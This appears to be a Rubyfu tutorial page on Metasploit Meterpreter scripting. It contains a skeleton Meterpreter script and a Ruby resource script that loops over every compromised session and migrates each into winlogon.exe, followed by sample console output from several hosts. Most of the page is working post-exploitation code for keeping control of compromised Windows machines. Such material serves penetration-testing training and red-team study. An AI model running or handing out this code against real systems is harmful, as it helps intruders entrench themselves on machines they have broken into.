Meterpreter Scripting
Since the Meterpreter scripting is planned to be removed and replaced with POST module, we’ll put a skeleton Meterpreter script only.
You can locate you new Meterpreter script in
- The framework it-self
metasploit-framework/scripts/meterpreter
or, - In your Metasploit user’s path
~/.msf/scripts/meterpreter
Absolute Meterpreter Script
# $Id$
# $Revision$
# Author:
#-------------------------------------------------------------------------------
################## Variable Declarations ##################
@client = client
sample_option_var = nil
@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu." ],
"-o" => [ true , "Option that requires a value"]
)
meter_type = client.platform
################## Function Declarations ##################
# Usage Message Function
#-------------------------------------------------------------------------------
def usage
print_line "Meterpreter Script for INSERT PURPOSE."
print_line(@exec_opts.usage)
raise Rex::Script::Completed
end
# Wrong Meterpreter Version Message Function
#-------------------------------------------------------------------------------
def wrong_meter_version(meter = meter_type)
print_error("#{meter} version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
################## Main ##################
@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-h"
usage
when "-o"
sample_option_var = val
end
}
# Check for Version of Meterpreter
wrong_meter_version(meter_type) if meter_type !~ /win32|win64|java|php|linux/i # Remove none supported versions
The script is directly quoted from the Metasploit samples
Run Process migration on multiple meterpreter sessions
From `msfconsole` and after getting all metherpreter sessions, go to post/windows/manage/migrate
use post/windows/manage/migrate
Note: make sure you’ve the sufficient privileges to migrate to the designated processe
Then create a file with rc
extension including the <ruby> </ruby>
tages
mass-mirgation.rc
<ruby>
# Find PID by name
def find_pid(session_num, session, process)
print_status("Session #{session_num} | Finding PID of processe #{process}")
session.sys.process.get_processes().each do |x|
proc_name, proc_id = x['name'].downcase, x['pid']
return proc_id if proc_name == process.downcase
end
end
process = 'winlogon.exe'
framework.sessions.each do |num,session|
run_single("set PID #{find_pid(num, session, process)}")
run_single("set SESSION #{num}")
print_status("Running #{active_module.fullname} against session #{num}")
run_single("run -j")
sleep 1
end
</ruby>
Now, from msfconsole,
resource /home/rubyfu/mass-migration.rc
Result will be similar to
[*] Running post/windows/manage/migrate against session 2
[*] Post module running as background job
[*] Running module against WIN-NG118S6TM0H
[*] Current server process: shell.exe (3968)
[*] Spawning notepad.exe process to migrate to
[*] Session 2 | Finding PID of processe winlogon.exe
[+] Migrating to 3628
SESSION => 3
[*] Running post/windows/manage/migrate against session 3
[*] Post module running as background job
[*] Running module against HOME
[*] Current server process: shell.exe (2684)
[*] Session 3 | Finding PID of processe winlogon.exe
[+] Migrating to 2444
SESSION => 4
[*] Running post/windows/manage/migrate against session 4
[*] Post module running as background job
[*] Running module against WIN-8H4IDI0SR5A
[*] Current server process: shell.exe (2996)
[*] Session 4 | Finding PID of processe winlogon.exe
[+] Migrating to 2240
[+] Successfully migrated to process 3628
[+] Successfully migrated to process 2444
[+] Successfully migrated to process 2240